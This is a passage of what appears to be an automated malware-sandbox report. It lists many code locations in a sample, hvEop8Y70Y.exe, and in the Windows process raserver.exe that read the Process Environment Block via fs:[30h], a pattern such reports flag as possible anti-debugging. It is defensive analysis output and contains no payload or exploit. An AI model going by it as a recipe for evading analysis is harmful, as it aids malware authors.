            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01553884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01553884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015190AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01503B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01503B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0158D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01564257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0151927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0158B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0158B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01514A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01514A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01513D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01553540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0155A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01588DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01501DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01501DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01501DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015035A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015914FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01556CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015137F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01508E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0158FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01518EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0158FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015036CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015016E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0156FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015546A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C0050 mov eax, dword ptr fs:[00000030h]
